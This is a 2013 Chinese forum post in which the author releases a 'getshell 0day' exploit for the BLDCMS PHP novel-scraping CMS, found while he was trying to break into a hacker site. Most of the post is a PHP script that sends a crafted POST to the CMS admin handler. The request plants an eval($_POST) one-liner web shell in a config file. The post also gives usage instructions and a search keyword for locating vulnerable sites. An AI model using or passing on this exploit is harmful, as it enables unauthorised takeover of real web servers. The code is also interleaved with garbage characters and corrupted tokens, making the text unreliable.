之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
1 D& v6 v& A: ]( S4 `# [0 j
' X9 R; W$ e4 G1 B7 E+ B7 w
}' V8 H5 |! l6 p5 G话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 6 m- X4 Q& ^/ Z- O
7 k2 s ~# d! e O- R! k, L$ L# Q既然都有人发了 我就把我之前写好的EXP放出来吧
' u- h- K; D6 |1 h : v. e% w& x9 `/ W0 Q
view source print?01.php;">5 a/ f5 `; I8 p% I( a. ^
02.<!--?php
% j M) G9 V2 Z( q6 _. q03.echo "-------------------------------------------------------------------
- i$ W# _& `/ r+ t6 P9 X5 X8 |04. ; j/ J) q9 Y+ S5 E
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP8 W" j) k% Y1 ], r6 f; d2 Y. o
06. % u% @* H5 h9 V4 M3 G
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun5 K& g; l' k& x5 O! e' n5 y0 U; d: c
08. 8 D1 t+ D9 t- ~0 }1 N
09.QQ:981009941\r\n 2013.3.21\r\n 2 z2 h" k. g( R* d) i" g8 m8 ?" K
10. ' E- o+ K0 B& ` c R% P% h
11.
: I* L. \) D* l( h! y1 i- k12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码2 [/ g' O) X* o8 A# a) I V
13. 0 M8 G5 U; f( V1 x% r
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
; N# Z, G G- ^/ \! a: \15. * o: s6 t6 ]& s; _8 @) w0 y: d
16.--------------------------------------------------------------------\r\n";" ^+ y- w* H) C. e
17.$url=$argv[1];
1 R+ q6 b% m. i1 M0 R18.$dir=$argv[2];4 F7 ~) B1 u+ T" m; K3 `. Y2 h8 w) L
19.$pass=$argv[3];
' n5 r0 P9 H; L) V20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';( ^5 `+ [& U& N0 E/ q, W
21.if (emptyempty($pass)||emptyempty($url))
( R! W0 n) H7 [! D8 t" F22.{exit("请输入参数");}+ L3 @) T% [) q( ^$ K' J
23.else
3 ]) l7 `! a7 \3 R4 L24.{4 m% [" G5 A K$ i1 p
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
7 z$ ?' Z. x3 W; `# b26. ! n. o9 a& L8 G5 W1 ~) k
27.al;
! C/ | F; ~# I; B9 }8 _) l& S28.$length = strlen($fuckdata);7 i3 h( V$ s6 M/ a, I
29.function getshell($url,$pass)
. `) z8 i C, {( G1 {30.{: W8 D9 [% p9 d; z
31.global $url,$dir,$pass,$eval,$length,$fuckdata;1 `( C$ h8 C( w+ T" G6 Q9 U
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";' P0 L" i; A: t w% E1 @, Y
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
9 A8 A9 B, k Y% v% i+ r34.$header .= "User-Agent: MSIE\r\n";: G& s: U+ l5 H2 ]
35.$header .= "Host:".$url."\r\n";
# r( U M2 i. m" m36.$header .= "Content-Length: ".$length."\r\n";# {- A8 n4 \/ V1 O- Y! o) x
37.$header .= "Connection: Close\r\n";
) M8 p1 Z3 ? b% S4 L' p38.$header .="\r\n";; s, R8 E& S! I4 C
39.$header .= $fuckdata."\r\n\r\n";" I* Z+ ^, H- S; O
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
1 j" i8 t; v) M: z+ y41.if (!$fp)) _* ?& A1 s2 V: b) D/ Y
42.{
: S" K" |7 J2 c: d& g43.exit ("利用失败:请检查指定目标是否能正常打开");0 G y2 B' V8 B* N' w. p7 g2 _
44.}
4 L$ w5 g: L4 |* E* ~" G45.else{ if (!fputs($fp,$header))
! j& T! n K9 s8 p% |# j! F \, U46.{exit ("利用失败");}
3 b1 m6 P) _) n47.else) K5 t9 v; Y7 S* t- Y$ c7 L6 B, j
48.{3 }; [7 N/ c; w b' R* s9 z
49.$receive = '';
N0 h( c5 @* D4 z6 K, V50.while (!feof($fp)) {
2 B r/ @2 M2 D2 ~- ~3 W) F51.$receive .= @fgets($fp, 1000);+ Z0 u9 ?5 k( D0 U" d
52.}+ H( C+ i( m2 o+ w' E3 v
53.@fclose($fp);
9 b, x- e% M, g54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
& y1 I2 u$ l! |; W- B( s- A4 S55. $ S+ I5 R: j; W& U6 K
56.GPC是否=off)";
; ]$ [: f. n1 F8 C5 V. P0 X4 M57.}}
& u- R; G+ `4 l1 Q, n% X58.}9 g0 S3 v) j$ _
59.}
8 S. A6 m1 B- f: B" C6 k2 J7 M, ^60.getshell($url,$pass);
3 V% O* n P" P0 m61.?-->8 Q8 B- g! p/ l/ I
; i' C; L4 r# O
- ^6 q9 D: M8 Z# O& @
6 J2 q2 G- y, }% N+ |+ C$ O. Wby 数据流
/ _+ B/ D2 K3 X/ T |
发表于 2013-3-26 20:49:10
收藏
支持
反对